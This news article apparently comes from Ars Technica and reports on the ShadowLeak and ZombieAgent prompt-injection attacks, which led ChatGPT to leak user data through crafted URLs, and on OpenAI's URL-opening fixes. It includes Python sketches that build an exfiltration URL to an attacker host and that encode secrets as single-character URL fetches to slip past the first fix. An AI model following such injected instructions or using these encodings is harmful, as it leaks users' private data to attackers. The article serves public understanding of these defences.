
OpenAI Tightens ChatGPT URL Controls After Prompt Injection Attacks

Ars Technica

Background of the attacks

Researchers discovered a prompt‑injection technique called ShadowLeak that coaxed ChatGPT into constructing new URLs by appending query parameters or embedding user‑derived data. By opening those URLs, the model could inadvertently exfiltrate that information to an attacker‑controlled server.
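For illustration, the following Python sketch shows the general shape of this kind of URL‑based exfiltration; the attacker domain, the leaked value, and the helper name are hypothetical and not taken from the researchers' report.

    # Hypothetical sketch: how an injected instruction could get data smuggled
    # into a freshly constructed URL. Domain and secret are placeholders.
    from urllib.parse import urlencode

    ATTACKER_BASE = "https://attacker.example/collect"  # hypothetical endpoint

    def build_exfil_url(secret: str) -> str:
        """Append user-derived data to a base URL as a query parameter."""
        return f"{ATTACKER_BASE}?{urlencode({'d': secret})}"

    # If the assistant can be coaxed into opening this URL, the request itself
    # delivers the secret to the attacker's server.
    print(build_exfil_url("alice@example.com"))
    # -> https://attacker.example/collect?d=alice%40example.com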

In response, OpenAI altered the system so that ChatGPT would only open URLs that match the exact string provided by the user, refusing to modify them even when explicitly instructed.
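In effect, the rule reduces to an exact string comparison. A minimal sketch, assuming the policy is simply that a candidate URL must match a user‑typed URL byte for byte (the function and variable names are illustrative):

    def may_open(candidate_url: str, user_supplied_urls: set[str]) -> bool:
        """Allow only URLs that exactly match a string the user provided."""
        return candidate_url in user_supplied_urls

    user_urls = {"https://example.com/report"}
    print(may_open("https://example.com/report", user_urls))           # True
    print(may_open("https://example.com/report?d=secret", user_urls))  # False: modified URL is refused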

Radware's ZombieAgent variant

Radware demonstrated a follow‑up method named ZombieAgent. This approach supplied a list of pre‑constructed URLs, each consisting of a base address followed by a single letter or number (for example, "example.com/a" or "example.com/0"). The prompt also instructed the model to replace spaces with a special token. Because OpenAI’s initial fix did not block the addition of a single character to a base URL, the model could still access these URLs one character at a time, allowing data to be exfiltrated letter by letter.
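The sketch below illustrates that character‑at‑a‑time encoding; the domain, the space‑replacement token, and the leaked value are placeholders rather than details from Radware's demonstration.

    import string

    BASE = "https://example.com/"
    # One exact, pre-constructed URL per allowed character.
    URL_FOR_CHAR = {c: BASE + c for c in string.ascii_lowercase + string.digits + "_"}

    def urls_to_request(secret: str) -> list[str]:
        """Encode the secret as a sequence of single-character URL fetches."""
        encoded = secret.lower().replace(" ", "_")  # placeholder space token
        return [URL_FOR_CHAR[c] for c in encoded if c in URL_FOR_CHAR]

    # The attacker reads the secret back from the order of requests in server logs.
    print(urls_to_request("top secret"))
    # -> ['https://example.com/t', 'https://example.com/o', 'https://example.com/p', ...]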

OpenAI’s second mitigation

To counter ZombieAgent, OpenAI introduced a stricter rule: ChatGPT may not open any link originating from an email unless the link appears in a well‑known public index or is directly supplied by the user within the chat prompt. This prevents the model from automatically following base URLs that could be controlled by an attacker.
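A rough sketch of such a policy, assuming it combines a public allowlist with user‑supplied links (the index contents and helper name are illustrative, not OpenAI's implementation):

    from urllib.parse import urlparse

    PUBLIC_INDEX = {"wikipedia.org", "github.com"}  # stand-in for a well-known public index

    def may_follow_email_link(url: str, user_supplied_urls: set[str]) -> bool:
        """Follow an email link only if its host is publicly indexed or the user gave the exact URL."""
        host = urlparse(url).netloc.lower()
        indexed = any(host == d or host.endswith("." + d) for d in PUBLIC_INDEX)
        return indexed or url in user_supplied_urls

    print(may_follow_email_link("https://en.wikipedia.org/wiki/Prompt_injection", set()))  # True
    print(may_follow_email_link("https://attacker.example/a", set()))                      # False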

Ongoing challenges

Both incidents illustrate a recurring pattern in software security where a mitigation is quickly followed by a new workaround. Analysts compare this cycle to the persistence of SQL injection and memory‑corruption vulnerabilities, which continue to be exploited despite years of defensive measures.

Pascal Geenens, vice president of threat intelligence at Radware, emphasized that “guardrails should not be considered fundamental solutions for the prompt injection problems. Instead, they are a quick fix to stop a specific attack. As long as there is no fundamental solution, prompt injection will remain an active threat and a real risk for organizations deploying AI assistants and agents.”


Source: Ars Technica
